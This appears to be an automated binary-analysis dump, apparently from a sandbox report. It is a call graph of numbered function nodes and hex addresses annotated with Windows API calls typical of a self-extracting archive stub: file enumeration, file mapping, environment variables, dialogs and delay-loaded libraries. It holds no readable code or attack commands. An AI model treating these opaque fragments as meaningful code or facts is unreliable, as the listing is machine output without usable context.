c9e31c 24708->24709 24730 c96891 24708->24730 24709->24664 24713 cafeb3 ___std_exception_copy 24711->24713 24712 cafecd 24712->24666 24713->24712 24715 cafecf 24713->24715 24751 cb8e4c 7 API calls 2 library calls 24713->24751 24716 c948f5 Concurrency::cancel_current_task 24715->24716 24717 cafed9 24715->24717 24749 cb3330 RaiseException 24716->24749 24752 cb3330 RaiseException 24717->24752 24720 c94911 24721 c94927 24720->24721 24750 c9136b 26 API calls Concurrency::cancel_current_task 24720->24750 24721->24666 24722 cb0810 24725 ca5c5e __EH_prolog 24724->24725 24726 cafeae 27 API calls 24725->24726 24727 ca5c7a 24726->24727 24728 c988f2 24727->24728 24753 ca215f 81 API calls 24727->24753 24728->24671 24731 c9689b __EH_prolog 24730->24731 24736 cb0013 24731->24736 24733 c968b7 24734 cb0013 41 API calls 24733->24734 24735 c968d9 __cftof 24734->24735 24735->24709 24738 cb001f ___scrt_is_nonwritable_in_current_image 24736->24738 24737 cb004a 24737->24733 24738->24737 24740 c96920 24738->24740 24741 c9692a __EH_prolog 24740->24741 24744 ca04e5 24741->24744 24743 c96936 24743->24738 24745 ca04ef __EH_prolog 24744->24745 24748 c94846 41 API calls 24745->24748 24747 ca050b 24747->24743 24748->24747 24749->24720 24750->24721 24751->24713 24752->24722 24753->24728 24755 c990ac __EH_prolog 24754->24755 24783 c913f8 24755->24783 24757 c990c8 24758 c990d9 24757->24758 24947 c9b1d2 24757->24947 24762 c99110 24758->24762 24795 c91ad3 24758->24795 24761 c9910c 24761->24762 24814 c92032 24761->24814 24939 c91641 24762->24939 24766 c991b2 24818 c9924e 24766->24818 24769 c99211 24769->24762 24826 c94264 24769->24826 24838 c992c6 24769->24838 24774 c9b966 7 API calls 24775 c99139 24774->24775 24775->24766 24775->24774 24951 c9d4d2 CompareStringW _wcslen 24775->24951 24777 c9b97b 24776->24777 24781 c9b9a9 24777->24781 25190 c9ba94 24777->25190 24779 c9b98b 24780 c9b990 FindClose 24779->24780 24779->24781 24780->24781 24781->24672 24782->24675 24784 c913fd __EH_prolog 24783->24784 24785 c96891 41 API calls 24784->24785 24786 c91428 24785->24786 24787 c9e298 41 API calls 24786->24787 24788 c91437 24787->24788 24789 cafeae 27 API calls 24788->24789 24792 c914ab 24788->24792 24790 c91498 24789->24790 24790->24792 24952 c9644d 24790->24952 24960 c9c1f7 24792->24960 24793 c91533 __cftof 24793->24757 24796 c91add __EH_prolog 24795->24796 24808 c91b30 24796->24808 24811 c91c63 24796->24811 24980 c913d9 24796->24980 24798 c91c9e 24992 c91397 75 API calls 24798->24992 24801 c94264 116 API calls 24805 c91ce9 24801->24805 24802 c91cab 24802->24801 24802->24811 24803 c91d31 24807 c91d64 24803->24807 24803->24811 24993 c91397 75 API calls 24803->24993 24805->24803 24806 c94264 116 API calls 24805->24806 24806->24805 24807->24811 24813 c9b110 80 API calls 24807->24813 24808->24798 24808->24802 24808->24811 24809 c94264 116 API calls 24810 c91db5 24809->24810 24810->24809 24810->24811 24811->24761 24813->24810 24815 c92037 __EH_prolog 24814->24815 24816 c92068 24815->24816 25009 c91a7e 24815->25009 24816->24775 25014 c9e395 24818->25014 24820 c9925e 25018 ca26f1 GetSystemTime SystemTimeToFileTime 24820->25018 24822 c991cc 24822->24769 24823 ca2ea4 24822->24823 25023 caef9b 24823->25023 24827 c94270 24826->24827 24828 c94274 24826->24828 24827->24769 24837 c9b110 80 API calls 24828->24837 24829 c94286 24830 c942af 24829->24830 24831 c942a1 24829->24831 25032 c92eb6 116 API calls 3 library calls 24830->25032 24832 c942e1 24831->24832 25031 c9395a 104 API calls 3 library calls 24831->25031 24832->24769 24835 c942ad 24835->24832 25033 c92544 75 API calls 24835->25033 24837->24829 24839 c992d0 __EH_prolog 24838->24839 24842 c9930e 24839->24842 24857 c9973d Concurrency::cancel_current_task 24839->24857 25074 ca9c9d 118 API calls 24839->25074 24840 c9a18d 24843 c9a192 24840->24843 24844 c9a1c5 24840->24844 24842->24840 24846 c9932f 24842->24846 24842->24857 24843->24857 25105 c98675 167 API calls 24843->25105 24844->24857 25106 ca9c9d 118 API calls 24844->25106 24846->24857 25034 c966df 24846->25034 24849 c99545 24852 c99669 24849->24852 24849->24857 25077 c98f6b 39 API calls 24849->25077 24851 c99405 24851->24849 25075 c9b5d6 57 API calls 3 library calls 24851->25075 24859 c9b966 7 API calls 24852->24859 24861 c996db 24852->24861 24856 c995ac 25076 cb8a08 26 API calls 2 library calls 24856->25076 24857->24769 24859->24861 24860 c99935 25084 c9e4a9 97 API calls 24860->25084 25040 c989c8 24861->25040 24864 c9976c 24883 c997c5 24864->24883 25078 c94727 41 API calls 2 library calls 24864->25078 24867 c99a3a 24872 c99a8c 24867->24872 24885 c99a45 24867->24885 24868 c99990 24868->24867 24874 c999bb 24868->24874 24870 c998f4 Concurrency::cancel_current_task 24870->24868 25085 c9851f 50 API calls 2 library calls 24870->25085 24875 c99a2c 24872->24875 25088 c98db3 120 API calls 24872->25088 24873 c99a8a 24876 c9a801 81 API calls 24873->24876 24874->24875 24877 c9b4c1 3 API calls 24874->24877 24881 c99ae8 24874->24881 24875->24873 24875->24881 24876->24857 24880 c999f3 24877->24880 24878 c9a801 81 API calls 24878->24857 24880->24875 25086 c9a50a 98 API calls 24880->25086 24897 c99b53 24881->24897 24926 c9a14a 24881->24926 25089 c9ab1c 24881->25089 24883->24857 24883->24870 24887 c998ed 24883->24887 25079 c987fb 41 API calls 24883->25079 25080 c9e4a9 97 API calls 24883->25080 25081 c9237a 75 API calls 24883->25081 25082 c98f28 99 API calls 24883->25082 24885->24873 25087 c98b7c 124 API calls 24885->25087 24886 c99ba2 24890 c9bf0a 27 API calls 24886->24890 25083 c9237a 75 API calls 24887->25083 24908 c99bb8 24890->24908 24895 c99b41 25093 c97951 78 API calls 24895->25093 25046 c9bf0a 24897->25046 24898 c99c8b 24899 c99e85 24898->24899 24900 c99ce7 24898->24900 24901 c99eab 24899->24901 24902 c99e97 24899->24902 24924 c99d20 24899->24924 24903 c99cff 24900->24903 24907 c99da7 24900->24907 25050 ca4576 24901->25050 25100 c9a475 138 API calls __EH_prolog 24902->25100 24905 c99d46 24903->24905 24912 c99d0e 24903->24912 24905->24924 25096 c9829b 112 API calls 24905->25096 25097 c98f6b 39 API calls 24907->25097 24908->24898 24909 c99c62 24908->24909 24917 c9aa7a 80 API calls 24908->24917 24909->24898 25094 c9ac9c 83 API calls 24909->25094 24910 c99ec4 25060 ca421f 24910->25060 25095 c9237a 75 API calls 24912->25095 24915 c99e76 24915->24769 24917->24909 24919 c99dec 24920 c99e08 24919->24920 24921 c99e1f 24919->24921 24919->24924 25098 c98037 86 API calls 24920->25098 25099 c9a212 104 API calls __EH_prolog 24921->25099 24924->24915 24929 c99fca 24924->24929 25101 c9237a 75 API calls 24924->25101 24926->24878 24927 c9b8e6 3 API calls 24930 c9a130 24927->24930 24928 c9a083 25069 c9b032 24928->25069 24929->24926 24929->24928 24937 c9a0d5 24929->24937 25102 c9b199 SetEndOfFile 24929->25102 24930->24926 25103 c9237a 75 API calls 24930->25103 24933 c9a0ca 24935 c9a880 78 API calls 24933->24935 24935->24937 24936 c9a140 25104 c97871 77 API calls 24936->25104 24937->24926 24937->24927 24940 c91653 24939->24940 24942 c91665 Concurrency::cancel_current_task 24939->24942 24940->24942 25187 c916b2 26 API calls 24940->25187 24943 c92111 26 API calls 24942->24943 24944 c91694 24943->24944 25188 c9e339 87 API calls Concurrency::cancel_current_task 24944->25188 24948 c9b1e9 24947->24948 24949 c9b1f3 24948->24949 25189 c977af 79 API calls 24948->25189 24949->24758 24951->24775 24953 c96457 __EH_prolog 24952->24953 24966 c9c9d8 GetCurrentProcess GetProcessAffinityMask 24953->24966 24955 c96464 24956 ca04e5 41 API calls 24955->24956 24957 c964bb 24956->24957 24967 c9665c GetCurrentProcess GetProcessAffinityMask 24957->24967 24959 c964d8 24959->24792 24961 c9c20d __cftof 24960->24961 24968 c9c0d3 24961->24968 24966->24955 24967->24959 24975 c9c0b4 24968->24975 24970 c9c148 24971 c92111 24970->24971 24972 c9212b 24971->24972 24973 c9211c 24971->24973 24972->24793 24979 c9136b 26 API calls Concurrency::cancel_current_task 24973->24979 24976 c9c0c2 24975->24976 24977 c9c0bd 24975->24977 24976->24970 24978 c92111 26 API calls 24977->24978 24978->24976 24979->24972 24994 c91822 24980->24994 24983 c9b110 24984 c9b122 24983->24984 24985 c9b135 24983->24985 24988 c9b140 24984->24988 25007 c97800 78 API calls 24984->25007 24987 c9b148 SetFilePointer 24985->24987 24985->24988 24987->24988 24989 c9b164 GetLastError 24987->24989 24988->24808 24989->24988 24990 c9b16e 24989->24990 24990->24988 25008 c97800 78 API calls 24990->25008 24992->24811 24993->24807 24996 c91834 24994->24996 25002 c913f2 24994->25002 24995 c9185d 24998 cb520e 22 API calls 24995->24998 24996->24995 25004 c976e9 77 API calls __vswprintf_c_l 24996->25004 25000 c9187a 24998->25000 24999 c91853 25005 c9775a 76 API calls 24999->25005 25000->25002 25006 c9775a 76 API calls 25000->25006 25002->24983 25004->24999 25005->24995 25006->25002 25007->24985 25008->24988 25010 c91a8a 25009->25010 25011 c91a8e 25009->25011 25010->24816 25013 c919c5 143 API calls 25011->25013 25013->25010 25015 c9e3a5 25014->25015 25017 c9e3ac 25014->25017 25019 c9aa7a 25015->25019 25017->24820 25018->24822 25020 c9aa93 25019->25020 25022 c9b110 80 API calls 25020->25022 25021 c9aac5 25021->25017 25022->25021 25024 caefa8 25023->25024 25025 c9f937 53 API calls 25024->25025 25026 caefcb 25025->25026 25027 c94a20 _swprintf 51 API calls 25026->25027 25028 caefdd 25027->25028 25029 cae607 17 API calls 25028->25029 25030 ca2eba 25029->25030 25030->24769 25031->24835 25032->24835 25033->24832 25035 c966ef 25034->25035 25107 c965fb 25035->25107 25038 c96722 25039 c9675a 25038->25039 25112 c9c6af CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25038->25112 25039->24851 25041 c989dd 25040->25041 25042 c98a15 25041->25042 25118 c97931 75 API calls 25041->25118 25042->24857 25042->24860 25042->24864 25044 c98a0d 25119 c91397 75 API calls 25044->25119 25047 c9bf18 25046->25047 25049 c9bf22 25046->25049 25048 cafeae 27 API calls 25047->25048 25048->25049 25049->24886 25051 ca458b 25050->25051 25053 ca4595 ___std_exception_copy 25050->25053 25120 c9775a 76 API calls 25051->25120 25054 ca461b 25053->25054 25055 ca46c5 25053->25055 25059 ca463f __cftof 25053->25059 25121 ca44a9 76 API calls 3 library calls 25054->25121 25122 cb3330 RaiseException 25055->25122 25058 ca46f1 25059->24910 25061 ca4228 25060->25061 25062 ca4251 25060->25062 25063 ca4245 25061->25063 25064 ca4247 25061->25064 25066 ca423d 25061->25066 25062->25063 25137 ca66c4 138 API calls 2 library calls 25062->25137 25063->24924 25136 ca739e 133 API calls 25064->25136 25123 ca7dcc 25066->25123 25070 c9b043 25069->25070 25072 c9b052 25069->25072 25071 c9b049 FlushFileBuffers 25070->25071 25070->25072 25071->25072 25073 c9b0cf SetFileTime 25072->25073 25073->24933 25074->24842 25075->24856 25076->24849 25077->24852 25078->24883 25079->24883 25080->24883 25081->24883 25082->24883 25083->24870 25084->24870 25085->24868 25086->24875 25087->24873 25088->24875 25090 c99b2b 25089->25090 25091 c9ab25 GetFileType 25089->25091 25090->24897 25092 c9237a 75 API calls 25090->25092 25091->25090 25092->24895 25093->24897 25094->24898 25095->24924 25096->24924 25097->24919 25098->24924 25099->24924 25100->24924 25101->24929 25102->24928 25103->24936 25104->24926 25105->24857 25106->24857 25113 c964f8 25107->25113 25110 c9661c 25110->25038 25111 c964f8 2 API calls 25111->25110 25112->25038 25114 c96502 25113->25114 25116 c965ea 25114->25116 25117 c9c6af CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25114->25117 25116->25110 25116->25111 25117->25114 25118->25044 25119->25042 25120->25053 25121->25059 25122->25058 25138 ca479d 25123->25138 25126 ca81ee 25162 ca63a9 99 API calls __InternalCxxFrameHandler 25126->25162 25128 ca81fe __InternalCxxFrameHandler 25128->25063 25135 ca7ddd __InternalCxxFrameHandler 25135->25126 25144 c9e56c 25135->25144 25153 ca5001 133 API calls 25135->25153 25154 ca8243 133 API calls 25135->25154 25155 ca229f 89 API calls 25135->25155 25156 ca24df 25135->25156 25160 ca4b0c 99 API calls __InternalCxxFrameHandler 25135->25160 25161 ca889f 138 API calls __InternalCxxFrameHandler 25135->25161 25136->25063 25137->25063 25140 ca47a7 __cftof __EH_prolog 25138->25140 25139 ca4892 25139->25135 25140->25139 25141 cb0013 41 API calls 25140->25141 25142 ca4829 __cftof ___std_exception_copy 25140->25142 25141->25142 25142->25139 25163 c9775a 76 API calls 25142->25163 25151 c9e582 __InternalCxxFrameHandler 25144->25151 25145 c9e6f2 25146 c9e726 25145->25146 25164 c9e523 25145->25164 25168 ca2121 25146->25168 25150 c9e6e9 25150->25135 25151->25145 25151->25150 25174 c9bff5 92 API calls __EH_prolog 25151->25174 25175 ca9c9d 118 API calls 25151->25175 25153->25135 25154->25135 25155->25135 25157 ca24eb ResetEvent ReleaseSemaphore 25156->25157 25158 ca2516 25156->25158 25186 ca22fc 80 API calls 25157->25186 25158->25135 25160->25135 25161->25135 25162->25128 25163->25142 25165 c9e568 25164->25165 25166 c9e52b 25164->25166 25165->25146 25166->25165 25176 ca2e58 25166->25176 25169 ca2128 25168->25169 25170 ca2143 25169->25170 25184 c976e4 RaiseException Concurrency::cancel_current_task 25169->25184 25172 ca2154 SetThreadExecutionState 25170->25172 25185 c976e4 RaiseException Concurrency::cancel_current_task 25170->25185 25172->25150 25174->25151 25175->25151 25179 caeead 25176->25179 25180 ca15a3 25179->25180 25181 caeec4 SendDlgItemMessageW 25180->25181 25182 cac748 PeekMessageW KiUserCallbackDispatcher IsDialogMessageW TranslateMessage DispatchMessageW 25181->25182 25183 ca2e78 25182->25183 25183->25165 25184->25170 25185->25172 25186->25158 25189->24949 25191 c9baa1 25190->25191 25192 c9baba FindFirstFileW 25191->25192 25193 c9bb20 FindNextFileW 25191->25193 25195 c9bac9 25192->25195 25200 c9bb02 25192->25200 25194 c9bb2b GetLastError 25193->25194 25193->25200 25194->25200 25196 c9cf32 GetCurrentDirectoryW 25195->25196 25197 c9bad9 25196->25197 25198 c9badd FindFirstFileW 25197->25198 25199 c9baf7 GetLastError 25197->25199 25198->25199 25198->25200 25199->25200 25200->24779 25201->24681 25203 ca3540 25202->25203 25205 ca3560 Concurrency::cancel_current_task 25203->25205 25207 ca2206 25203->25207 25208 ca24df 82 API calls 25207->25208 25209 ca2228 ReleaseSemaphore 25208->25209 25210 ca2248 25209->25210 25211 ca2266 DeleteCriticalSection CloseHandle CloseHandle 25209->25211 25214 ca22fc 80 API calls 25210->25214 25211->25205 25213 ca2252 CloseHandle 25213->25210 25213->25211 25214->25213 25224 cab5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25215->25224 25217 cab5cd 25218 cab5d9 25217->25218 25225 cab605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25217->25225 25218->24393 25218->24394 25220->24399 25221->24403 25222->24403 25223->24406 25224->25217 25225->25218 25226->24413 25228 c9b1d2 79 API calls 25227->25228 25229 c9208f 25228->25229 25230 c91ad3 116 API calls 25229->25230 25233 c920ac 25229->25233 25231 c9209c 25230->25231 25231->25233 25234 c91397 75 API calls 25231->25234 25233->24422 25233->24423 25234->25233 25236 caffc0 25235->25236 25237 c9b4e0 GetFileAttributesW 25236->25237 25238 c9b4ca 25237->25238 25239 c9b4f1 25237->25239 25238->24191 25238->24206 25240 c9cf32 GetCurrentDirectoryW 25239->25240 25241 c9b505 25240->25241 25241->25238 25242 c9b509 GetFileAttributesW 25241->25242 25242->25238 25243->24442 25244->24443 25245->24447 25246->24456 26119 cb4bc0 5 API calls CatchGuardHandler 26078 cabdd0 74 API calls 26120 cb73d0 QueryPerformanceFrequency QueryPerformanceCounter 25254 c9acd4 25255 c9acde 25254->25255 25256 c9acf4 25255->25256 25257 c9ae2c SetFilePointer 25255->25257 25259 c9aa7a 80 API calls 25255->25259 25260 c9ae05 25255->25260 25257->25256 25258 c9ae49 GetLastError 25257->25258 25258->25256 25259->25260 25260->25257 26079 cc05d1 21 API calls __vswprintf_c_l 26103 cac2e3 79 API calls 26047 cb10e0 LocalFree 26080 cbd1e0 GetProcessHeap 26081 caede1 DialogBoxParamW 26104 ca2efb GetCPInfo IsDBCSLeadByte 25273 c913fd 43 API calls 2 library calls 25277 caeff2 25278 caefff 25277->25278 25279 c9f937 53 API calls 25278->25279 25280 caf00c 25279->25280 25281 c94a20 _swprintf 51 API calls 25280->25281 25282 caf021 SetDlgItemTextW 25281->25282 25283 cac748 5 API calls 25282->25283 25284 caf03e 25283->25284 26083 cb05f0 27 API calls 26049 cc30f0 CloseHandle 26106 cad8c6 112 API calls 4 library calls 25775 cab080 25776 cab0a9 NtdllDefWindowProc_W 25775->25776 25777 cab08f SetWindowLongW 25775->25777 25780 caa812 25777->25780 25779 cab0a8 25779->25776 25781 cafeae 27 API calls 25780->25781 25782 caa829 25781->25782 25784 caa859 25782->25784 25785 cab0be CLSIDFromString CoCreateInstance 25782->25785 25784->25779 25786 cab0f6 25785->25786 25786->25784 26084 cbb580 21 API calls 2 library calls 26107 cb3a80 6 API calls 4 library calls 26123 cb0780 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26086 caf59f 14 API calls ___delayLoadHelper2@8 26087 cad8c6 109 API calls 4 library calls 26051 caa490 GetClientRect CopyRect 26052 cbd090 GetCommandLineA GetCommandLineW 26053 c91095 44 API calls 26125 cac7a0 110 API calls 26126 cb0eff 9 API calls 2 library calls 25983 cbbda0 25985 cbbdab 25983->25985 25986 cbbdd4 25985->25986 25987 cbbdd0 25985->25987 25989 cbc0ba 25985->25989 25996 cbbe00 DeleteCriticalSection 25986->25996 25990 cbbe48 __dosmaperr 5 API calls 25989->25990 25991 cbc0e1 25990->25991 25992 cbc0ea 25991->25992 25993 cbc0ff InitializeCriticalSectionAndSpinCount 25991->25993 25994 cb0d6c CatchGuardHandler 5 API calls 25992->25994 25993->25992 25995 cbc116 25994->25995 25995->25985 25996->25987 26128 cad8c6 103 API calls 4 library calls 26089 cad8c6 98 API calls 4 library calls 26055 cbb8b0 21 API calls 26056 cb9cb0 7 API calls ___scrt_uninitialize_crt 26037 c910b5 26038 c9644d 43 API calls 26037->26038 26039 c910ba 26038->26039 26042 cb0362 29 API calls 26039->26042 26041 c910c4 26042->26041 26090 cc3db0 VariantClear 26129 cc03b0 51 API calls 24071 cafd48 24072 cafd52 24071->24072 24075 caf9d9 24072->24075 24101 caf737 24075->24101 24077 caf9e9 24078 cafa46 24077->24078 24082 cafa6a 24077->24082 24079 caf977 DloadReleaseSectionWriteAccess 6 API calls 24078->24079 24080 cafa51 RaiseException 24079->24080 24095 cafc3f 24080->24095 24081 cafb55 24086 cafc11 24081->24086 24088 cafbb3 GetProcAddress 24081->24088 24082->24081 24083 cafae2 LoadLibraryExA 24082->24083 24084 cafb43 24082->24084 24082->24086 24083->24084 24085 cafaf5 GetLastError 24083->24085 24084->24081 24089 cafb4e FreeLibrary 24084->24089 24087 cafb1e 24085->24087 24097 cafb08 24085->24097 24110 caf977 24086->24110 24090 caf977 DloadReleaseSectionWriteAccess 6 API calls 24087->24090 24088->24086 24091 cafbc3 GetLastError 24088->24091 24089->24081 24092 cafb29 RaiseException 24090->24092 24098 cafbd6 24091->24098 24092->24095 24094 caf977 DloadReleaseSectionWriteAccess 6 API calls 24096 cafbf7 RaiseException 24094->24096 24099 caf737 ___delayLoadHelper2@8 6 API calls 24096->24099 24097->24084 24097->24087 24098->24086 24098->24094 24100 cafc0e 24099->24100 24100->24086 24102 caf769 24101->24102 24103 caf743 24101->24103 24102->24077 24118 caf7e0 24103->24118 24105 caf748 24106 caf764 24105->24106 24121 caf909 24105->24121 24126 caf76a GetModuleHandleW GetProcAddress GetProcAddress 24106->24126 24109 caf9b2 24109->24077 24111 caf9ab 24110->24111 24112 caf989 24110->24112 24111->24095 24113 caf7e0 DloadReleaseSectionWriteAccess 3 API calls 24112->24113 24114 caf98e 24113->24114 24115 caf9a6 24114->24115 24116 caf909 DloadProtectSection 3 API calls 24114->24116 24129 caf9ad GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24115->24129 24116->24115 24127 caf76a GetModuleHandleW GetProcAddress GetProcAddress 24118->24127 24120 caf7e5 24120->24105 24122 caf91e DloadProtectSection 24121->24122 24123 caf924 24122->24123 24124 caf959 VirtualProtect 24122->24124 24128 caf81f VirtualQuery GetSystemInfo 24122->24128 24123->24106 24124->24123 24126->24109 24127->24120 24128->24124 24129->24111 26057 cab440 GdipCloneImage GdipAlloc 26130 cae740 71 API calls 26091 cb1540 51 API calls 2 library calls 26061 c9a850 81 API calls Concurrency::cancel_current_task 26093 c96950 41 API calls __EH_prolog 26062 caa450 IsWindow 26063 cac450 101 API calls 26064 cbb850 31 API calls 2 library calls 26110 cbb650 71 API calls _free 26111 cafe51 48 API calls _unexpected 26112 cc1a50 IsProcessorFeaturePresent 26132 cbc368 27 API calls 4 library calls 26113 cb3e7b 38 API calls 4 library calls 26097 c92570 97 API calls 26067 ca8870 133 API calls 26098 cb1170 RaiseException Concurrency::cancel_current_task _com_error::_com_error 25286 c91075 25287 ca04e5 41 API calls 25286->25287 25288 c9107a 25287->25288 25291 cb0362 29 API calls 25288->25291 25290 c91084 25291->25290 25295 c9b20a 25296 c9b21f 25295->25296 25298 c9b218 25295->25298 25297 c9b22c GetStdHandle 25296->25297 25305 c9b23b 25296->25305 25297->25305 25299 c9b293 WriteFile 25299->25305 25300 c9b25f 25301 c9b264 WriteFile 25300->25301 25300->25305 25301->25300 25301->25305 25303 c9b325 25307 c97951 78 API calls 25303->25307 25305->25298 25305->25299 25305->25300 25305->25301 25305->25303 25306 c9765a 79 API calls 25305->25306 25306->25305 25307->25298 25309 cb0602 25310 cb060e ___scrt_is_nonwritable_in_current_image 25309->25310 25341 cb019c 25310->25341 25312 cb0615 25313 cb0768 25312->25313 25316 cb063f 25312->25316 25418 cb09fa 4 API calls 2 library calls 25313->25418 25315 cb076f 25411 cb930a 25315->25411 25328 cb067e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 25316->25328 25352 cb9ead 25316->25352 25323 cb065e 25325 cb06df 25360 cb0b15 GetStartupInfoW __cftof 25325->25360 25327 cb06e5 25361 cb9dfe 51 API calls 25327->25361 25328->25325 25414 cb8dfc 38 API calls 2 library calls 25328->25414 25331 cb06ed 25362 caf04c 25331->25362 25335 cb0701 25335->25315 25336 cb0705 25335->25336 25337 cb070e 25336->25337 25416 cb92ad 28 API calls _abort 25336->25416 25417 cb030d 12 API calls ___scrt_uninitialize_crt 25337->25417 25340 cb0716 25340->25323 25342 cb01a5 25341->25342 25420 cb0816 IsProcessorFeaturePresent 25342->25420 25344 cb01b1 25421 cb3bde 25344->25421 25346 cb01b6 25347 cb01ba 25346->25347 25429 cb9d37 25346->25429 25347->25312 25350 cb01d1 25350->25312 25355 cb9ec4 25352->25355 25353 cb0d6c CatchGuardHandler 5 API calls 25354 cb0658 25353->25354 25354->25323 25356 cb9e51 25354->25356 25355->25353 25357 cb9e80 25356->25357 25358 cb0d6c CatchGuardHandler 5 API calls 25357->25358 25359 cb9ea9 25358->25359 25359->25328 25360->25327 25361->25331 25478 ca1b7c 25362->25478 25366 caf06c 25527 cabd0b 25366->25527 25368 caf075 __cftof 25369 caf088 GetCommandLineW 25368->25369 25370 caf09b 25369->25370 25371 caf12c GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 25369->25371 25531 cad6f8 25370->25531 25373 c94a20 _swprintf 51 API calls 25371->25373 25374 caf193 SetEnvironmentVariableW GetModuleHandleW LoadIconW 25373->25374 25542 cac8bd LoadBitmapW 25374->25542 25377 caf0a9 OpenFileMappingW 25381 caf11d CloseHandle 25377->25381 25382 caf0c1 MapViewOfFile 25377->25382 25378 caf126 25536 caed1e 25378->25536 25381->25371 25384 caf0d2 __InternalCxxFrameHandler 25382->25384 25385 caf116 UnmapViewOfFile 25382->25385 25388 caed1e 2 API calls 25384->25388 25385->25381 25390 caf0ee 25388->25390 25572 ca0695 83 API calls 25390->25572 25391 caa0c7 27 API calls 25393 caf1f3 DialogBoxParamW 25391->25393 25397 caf22d 25393->25397 25394 caf102 25573 ca074b 83 API calls _wcslen 25394->25573 25396 caf10d 25396->25385 25398 caf23f Sleep 25397->25398 25399 caf246 25397->25399 25398->25399 25402 caf254 25399->25402 25574 cabfa3 CompareStringW SetCurrentDirectoryW __cftof _wcslen 25399->25574 25401 caf273 DeleteObject 25403 caf288 DeleteObject 25401->25403 25404 caf28f 25401->25404 25402->25401 25403->25404 25405 caf2d2 25404->25405 25406 caf2c0 25404->25406 25569 cabd71 25405->25569 25575 caed7b 6 API calls 25406->25575 25408 caf2c6 CloseHandle 25408->25405 25410 caf30c 25415 cb0b4b GetModuleHandleW 25410->25415 25707 cb9087 25411->25707 25414->25325 25415->25335 25416->25337 25417->25340 25418->25315 25420->25344 25433 cb4c87 25421->25433 25424 cb3be7 25424->25346 25426 cb3bef 25427 cb3bfa 25426->25427 25447 cb4cc3 DeleteCriticalSection 25426->25447 25427->25346 25474 cbd20a 25429->25474 25432 cb3bfd 7 API calls 2 library calls 25432->25347 25434 cb4c90 25433->25434 25436 cb4cb9 25434->25436 25438 cb3be3 25434->25438 25448 cb4ecc 25434->25448 25453 cb4cc3 DeleteCriticalSection 25436->25453 25438->25424 25439 cb3d0c 25438->25439 25467 cb4ddd 25439->25467 25443 cb3d3c 25443->25426 25444 cb3d2f 25444->25443 25473 cb3d3f 6 API calls ___vcrt_FlsFree 25444->25473 25446 cb3d21 25446->25426 25447->25424 25454 cb4cf2 25448->25454 25451 cb4f04 InitializeCriticalSectionAndSpinCount 25452 cb4eef 25451->25452 25452->25434 25453->25438 25455 cb4d13 25454->25455 25456 cb4d0f 25454->25456 25455->25456 25458 cb4d7b GetProcAddress 25455->25458 25460 cb4d6c 25455->25460 25462 cb4d92 LoadLibraryExW 25455->25462 25456->25451 25456->25452 25458->25456 25459 cb4d89 25458->25459 25459->25456 25460->25458 25461 cb4d74 FreeLibrary 25460->25461 25461->25458 25463 cb4dd9 25462->25463 25464 cb4da9 GetLastError 25462->25464 25463->25455 25464->25463 25465 cb4db4 ___vcrt_FlsSetValue 25464->25465 25465->25463 25466 cb4dca LoadLibraryExW 25465->25466 25466->25455 25468 cb4cf2 ___vcrt_FlsSetValue 5 API calls 25467->25468 25469 cb4df7 25468->25469 25470 cb4e10 TlsAlloc 25469->25470 25471 cb3d16 25469->25471 25471->25446 25472 cb4e8e 6 API calls ___vcrt_FlsSetValue 25471->25472 25472->25444 25473->25446 25477 cbd223 25474->25477 25475 cb0d6c CatchGuardHandler 5 API calls 25476 cb01c3 25475->25476 25476->25350 25476->25432 25477->25475 25479 caffc0 25478->25479 25480 ca1b86 GetModuleHandleW 25479->25480 25481 ca1c00 25480->25481 25482 ca1ba1 GetProcAddress 25480->25482 25483 ca1f2d GetModuleFileNameW 25481->25483 25585 cb89de 42 API calls 2 library calls 25481->25585 25484 ca1bba 25482->25484 25485 ca1bd2 GetProcAddress 25482->25485 25494 ca1f4b 25483->25494 25484->25485 25487 ca1be4 25485->25487 25487->25481 25488 ca1e6d 25488->25483 25489 ca1e78 GetModuleFileNameW CreateFileW 25488->25489 25490 ca1ea8 SetFilePointer 25489->25490 25491 ca1f21 CloseHandle 25489->25491 25490->25491 25492 ca1eb6 ReadFile 25490->25492 25491->25483 25492->25491 25500 ca1ed4 25492->25500 25496 ca1fad GetFileAttributesW 25494->25496 25497 ca1fc5 25494->25497 25499 ca1f76 CompareStringW 25494->25499 25576 c9c619 25494->25576 25579 ca1b34 25494->25579 25496->25494 25496->25497 25501 ca1fd0 25497->25501 25503 ca2005 25497->25503 25498 ca1b34 2 API calls 25498->25500 25499->25494 25500->25491 25500->25498 25504 ca1fe9 GetFileAttributesW 25501->25504 25506 ca2001 25501->25506 25502 ca2114 25526 cab64d GetCurrentDirectoryW 25502->25526 25503->25502 25505 c9c619 GetVersionExW 25503->25505 25504->25501 25504->25506 25507 ca201f 25505->25507 25506->25503 25508 ca208c 25507->25508 25509 ca2026 25507->25509 25510 c94a20 _swprintf 51 API calls 25508->25510 25511 ca1b34 2 API calls 25509->25511 25512 ca20b4 AllocConsole 25510->25512 25513 ca2030 25511->25513 25514 ca210c ExitProcess 25512->25514 25515 ca20c1 GetCurrentProcessId AttachConsole 25512->25515 25516 ca1b34 2 API calls 25513->25516 25586 cb4f93 25515->25586 25518 ca203a 25516->25518 25520 c9f937 53 API calls 25518->25520 25519 ca20e2 GetStdHandle WriteConsoleW Sleep FreeConsole 25519->25514 25521 ca2055 25520->25521 25522 c94a20 _swprintf 51 API calls 25521->25522 25523 ca2068 25522->25523 25524 c9f937 53 API calls 25523->25524 25525 ca2077 25524->25525 25525->25514 25526->25366 25528 ca1b34 2 API calls 25527->25528 25529 cabd1f OleInitialize 25528->25529 25530 cabd42 GdiplusStartup SHGetMalloc 25529->25530 25530->25368 25534 cad702 25531->25534 25532 cad818 25532->25377 25532->25378 25533 ca32f7 CharUpperW 25533->25534 25534->25532 25534->25533 25588 ca074b 83 API calls _wcslen 25534->25588 25537 caffc0 25536->25537 25538 caed2b SetEnvironmentVariableW 25537->25538 25540 caed4e 25538->25540 25539 caed76 25539->25371 25540->25539 25541 caed6a SetEnvironmentVariableW 25540->25541 25541->25539 25543 cac8eb GetObjectW 25542->25543 25544 cac8de 25542->25544 25546 cac8fa 25543->25546 